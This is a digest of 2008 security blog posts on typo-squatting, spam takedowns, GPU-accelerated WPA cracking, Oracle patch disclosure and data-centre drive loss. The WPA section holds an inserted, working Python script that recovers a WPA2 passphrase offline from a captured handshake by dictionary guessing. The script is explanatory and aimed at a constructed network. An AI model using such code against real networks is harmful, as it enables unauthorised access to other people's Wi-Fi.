So people think that they can spice up their presentation by using slide transition or animations like Boomerang, Checkerboard, Wedge, Blinds, Newsflash and lord help us, Random. But in fact, it's really annoying and it takes the focus away from the core of the presentation: YOU!

I did this exercise once. I was talking about a subject and had bullet points FLYING in, one by one. You saw the people changing their eye focus from me to the screen. Then I asked the audience about a point I just made, that wasn't in the slide. Most people admitted not having heard it. So think twice before using those animations or cheesy transitions. Keep it simple (KIS).



Report Fingers Google’s Ill Gotten Gains From Illegal Typo-Squatting [Infosecurity.US]

Posted: 15 Oct 2008 11:57 AM CDT

News has surfaced (via a report authored by Harvard University Assistant Professor Ben Edelman) of evidence pointing to apparent illegal business practices committed by third-party miscreants that are generating huge profits from typo squatting. Apparently, according to the report, Google (NasdaqGS: GOOG) then generates income based on AdSense and AdWord services (which stands to [...]

Major Spam Operation Terminated [Infosecurity.US]

Posted: 15 Oct 2008 11:40 AM CDT

KnujOn reports the termination of a major spam operation. The United States Federal Trade Commission has terminated (hopefully with extreme prejudice…ed.) the criminal activities of ‘Herbal King’. From the FTC via KnujOn: “A U.S. district court has ordered a halt to the operations of a vast international spam network that peddled prescription drugs and bogus male-enhancement [...]

GNUCITIZEN Announces New, Online Security System [Infosecurity.US]

Posted: 15 Oct 2008 11:34 AM CDT

GNUCITIZEN has announced a new, online security system dubbed NETSECURIFY (currently in private beta), part of their portfolio of services monikered in the same vein (as it were): BLOGSECURIFY and WEBSECURIFY. Read an excerpt from the full post after the jump. From the post: "Netsecurify is part of GNUCITIZEN's online security toolkit including tools such as [...]

SC Magazine article on new perimeter [CTO Chronicles]

Posted: 15 Oct 2008 11:31 AM CDT

SC Magazine has a cover story up here on "The New Perimeter" that features New York City Transit's NAC deployment.  In addition to being a good plug for Mirage (which I'm never above promoting!), it also has good information on the dissolving network perimeter (a primary NAC driver), NAC market sizing and the importance of defense in depth.  Definitely worth a read.

Hackers Only Responsible for 1% of Data Breaches [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 09:39 AM CDT

According to a study, only one percent of data breaches are caused by hackers! The leading cause of data breaches: negligent team members!

Source: Data News.

[Chinese] Russian researchers speed up WPA2 cracking 100-fold [Telecom,Security & P2P]

Posted: 15 Oct 2008 09:24 AM CDT

The Russian company ElcomSoft Co. Ltd has succeeded in using nVidia graphics card GPUs to speed up WPA/WPA2 cracking 100-fold. This report has attracted the interest of many security professionals.



NVidia GPU Used to Crack WPA(2) Keys [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 08:45 AM CDT

I found this article about a Russian firm that developed a tool which uses NVIDIA GPUs (up to four of them) to brute-force WPA and WPA2 pre-shared keys.

Here is the product: ElcomSoft Distributed Password Recovery.

Conclusion? A WPA/WPA2 pre-shared key is only as strong as the passphrase behind it, so Wi-Fi encryption alone is not sufficient to ensure confidentiality! Always use other encryption mechanisms over your Wi-Fi networks (VPN, SSL, SSH tunnels, …)
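The attack both posts above describe, reduced to the computation a GPU parallelises, as an added example (this is not ElcomSoft's code and not from either post): once a single 4-way handshake has been captured, every candidate passphrase is checked offline by deriving the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, as 802.11i specifies), expanding it with the PRF-512 into the PTK whose first 16 bytes are the KCK, and recomputing the EAPOL-Key MIC. The handshake used here is constructed in make_capture from a known passphrase (the MACs, nonces and simplified EAPOL-Key frame are made up), and the passphrase derivation is checked against the 802.11i Annex H test vector.

```python
import hashlib
import hmac

# IEEE 802.11i Annex H test vector: PMK for passphrase "password" on SSID "IEEE".
IEEE_TEST_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 rounds are the fixed cost of every guess: nothing else stands
    between the attacker and the key once a handshake has been captured."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11i: 64-byte PTK from the PMK plus both MAC addresses
    and both nonces, all of which are visible in the sniffed handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed),
    truncated to 16 bytes. WPA/TKIP uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(capture, candidates):
    """Offline dictionary attack: the first candidate that reproduces the captured MIC."""
    for guess in candidates:
        pmk = derive_pmk(guess, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]  # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


def make_capture(passphrase, ssid):
    """Constructed stand-in for a sniffed 4-way handshake (message 2). The MACs,
    nonces and EAPOL-Key frame are made up; only the MIC is computed for real."""
    ap_mac = bytes.fromhex("00c0ca123456")   # constructed
    sta_mac = bytes.fromhex("001122334455")  # constructed
    anonce = bytes(range(32))                # constructed (real ones are random)
    snonce = bytes(range(32, 64))            # constructed
    # EAPOL header, descriptor type, key info, key length, replay counter, SNonce,
    # key IV, RSC, key ID, MIC field (zeroed), key data length (no key data).
    eapol = (bytes.fromhex("0103005f" "02" "010a" "0010" "0000000000000001")
             + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    capture = make_capture("correct horse", "HomeNet")  # constructed victim network
    wordlist = ["12345678", "password", "letmein1", "correct horse"]
    print("recovered passphrase:", crack_handshake(capture, wordlist))
```

Nothing in the loop ever talks to the access point, so no lockout or rate limit applies; the 4096 HMAC rounds per guess are the whole cost, which is why a dictionary passphrase falls to a GPU in minutes while a long random one does not, and why the post's advice to layer VPN, SSL or SSH over the wireless link holds.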

It's that day of the quarter...Patch Tuesday [ImperViews]

Posted: 15 Oct 2008 08:37 AM CDT

This quarter's "Oracle patch Tuesday" has arrived again which means that there's no better time to share (yet again) my POV on patching as a security best practice.  Or should I say "worst" practice.

I'll be using Oracle as an example not because their patching cycles are worse than other vendors'. On the contrary, they have shown tremendous progress over the past 3 years, their latest improvement being the use of CVE identifiers to name the individual vulnerabilities.

One of the vulnerabilities fixed in this latest CPU (CVE-2008-2625) was discovered by me and reported to Oracle in December 2005. That's almost three years ago!

Now, Oracle had their reasons for not rushing to release a patch. First of all, it scores relatively low on the CVSS (4.0 out of 10.0), mainly because of its high access complexity. Additionally, it only affects a limited set of deployment scenarios (those that use proxy accounts). Now that the patch is out, administrators need to decide whether or not they want to apply it. Applying a patch is not only time consuming, it's also risky. Therefore we would expect an administrator to be able to answer the following questions in order to make an intelligible decision:

- Is the vulnerability affecting my database server?

- Is there a work around for my specific environment?

- Is there an external measure I can take to mitigate the vulnerability until a patch is applied?

Unfortunately, in the Oracle CPU advisory it is very hard to find answers to these questions. In the case of CVE-2008-2625, there is no mention of the fact that only deployments that use PROXY accounts are affected. In the case of other vulnerabilities such as CVE-2008-3989 or CVE-2008-3992, there is no mention of a work-around (i.e. remove the vulnerable packages, restrict access to administrative users, etc.).

The amount of information supplied is so scarce that while I know there is a PeopleSoft vulnerability I reported to Oracle which is fixed in this patch, I cannot identify which of the five it is! Only on one occasion did Oracle provide work-around information; this was earlier this year, when a vulnerability was disclosed on the Internet before a patch was available from Oracle.

Oracle, as I mentioned earlier, is not the only guilty vendor; in fact, IBM is even worse. Microsoft is somewhat better at providing the necessary work-around information. One of the arguments used by vendors for delaying disclosure is that too many details would allow hackers to create code that can exploit systems before they are protected. Let me tell you a secret: THEY ALREADY ARE!

Hacking is a growing business. Money is invested in creating new, efficient tools. Some of these tools are aimed at reverse engineering patches (I've been told that this is illegal, but so is hacking...). Any respectable hacker (notice the irony) owns such tools. For a savvy person using the appropriate tools, it takes days to create an exploit once the patch is out. Applying patches across an enterprise takes (at least) much, much longer than that.

Bottom line, vendors must provide more information, allowing administrators to make better decisions and permitting independent security vendors to provide external mitigation within a short time frame. Only in this way can enterprises deliver effective security for their databases.

- Amichai

S4 Registration Open! [Digital Bond]

Posted: 15 Oct 2008 08:22 AM CDT

General registration is now open for the 2009 edition of the SCADA Security Scientific Symposium [S4]. There are only 55 spots for physical attendees, so if you want to be part of a unique, highly technical event with other control system researchers and thought leaders [in beautiful Miami Beach in January] register early to get a spot.

Here are the key links:

We are really pleased with the technical rigor and importance of the accepted papers. We have papers from the US, Japan and France. Papers from well known researchers and new faces. Papers focused on vulnerabilities, security protocols, metrics and more. It is encouraging to see the progress the control system research community has made over the past 3 years.

I highly encourage you to check out the program that has more information on each session and the reason we selected it, as well as pictures of the venue and conference hotel.

We are again offering a physical attendee option for $995 and a virtual attendee option for $800.

Tuesday January 20, Bonus Training Course

  • Advanced Security Testing of Control System Components
  • The course that past attendees requested. Highly technical, limited to 24 students with 4 instructors. Training is available on site only, for a $600 supplement.

Wednesday January 21, S4 Day 1

  • Keynote - Stay tuned for more info - past keynotes include Whit Diffie, Steve Lipner and Dave Aitel
  • Leveraging Ethernet Card Vulnerabilities in Field Devices
  • Estimation and Observations of 0Day Vulnerabilities in Control Systems
  • Customizing Control System Intrusion Detection at the Application Layer
  • An Analysis of Two New Directions in Control System Perimeter Security
  • Secure Wireless Key Management for MAC-Layer Security and First Responder Credentialing
  • Invited Paper - stay tuned

Thursday January 22, S4 Day 2

  • Jamming and Interference Induced Denial of Service Attacks on IEEE 802.15.4 Based Wireless Networks
  • Low-Level Design Vulnerabilities in Wireless Control Systems Hardware
  • The Great Debate – Is It Possible to Safely and Securely Connect Safety Systems to Control Systems?
  • Security Metrics for Cyber Security Assurance
  • Denial of Control: Availability and Integrity Attacks Against Critical Systems
  • Aggregating and Correlating Security Events in Historians to Detect Cyber Attacks and Classify Attack Consequences

As in past years I will be previewing the papers beginning next week.

Encrypted within or without Restricted Areas [CultSEC Blog]

Posted: 15 Oct 2008 03:46 AM CDT

A friend forwarded an interesting article to me yesterday. It was posted on the BBC News web site, reporting "Up to 1.7m people's data missing." Of particular note in this article:

EDS assesses that it is unlikely that the device was encrypted because it was stored within a secure site that exceeded the standards necessary for restricted information.

Where do I start with this one?

First, let's take a simple view of this. The disk drive was stored within a secure site which exceeded standards. This belief only works if you have complete and detailed access control to the secure site. Assuming devices will never fail, maybe you can argue the risk level is low and the probability of a loss is a long shot. The only problem is, I haven't seen any site exercise complete and total control. Hardware does fail. If it is a disk drive, chances are the IT folks will replace the malfunctioning drive. The "bad" drive should be inventoried and its disposition tracked.

Now let's pick on the need to encrypt inside a secure site. In a perfect security world, every disk drive would be encrypted, even if it is stored inside a secure facility. We're not in a perfect world, so we have to rely on processes, procedures and controls to help mitigate risk. Until hard drives are encrypted on the fly, we'll continue to have this problem. Seagate has white papers and studies which discuss some issues around securing data centers and servers.

One quote from their site pertains to the subject:

Unauthorized data exposure can occur even in the best-managed data center. The wise precaution is to secure sensitive data with drive-level encryption, so that the data is rendered useless when the drive is unplugged and leaves the data center. Retired and repurposed drives can also be securely and completely erased before they are redeployed.

I pulled this up rather quickly, so please don't take this as a promotion of Seagate. Though it is nice to see manufacturers finally creating drives with full-disk encryption built into the drive itself. They also have an interesting site focused solely on encrypting drives in data centers.

The bottom line is this. Hard drives are mobile. They will fail on occasion. Failed drives can be recovered with the right technology. Processes are key. If a drive fails, degauss it or shred it. If the drive is being repurposed, erase the drive.
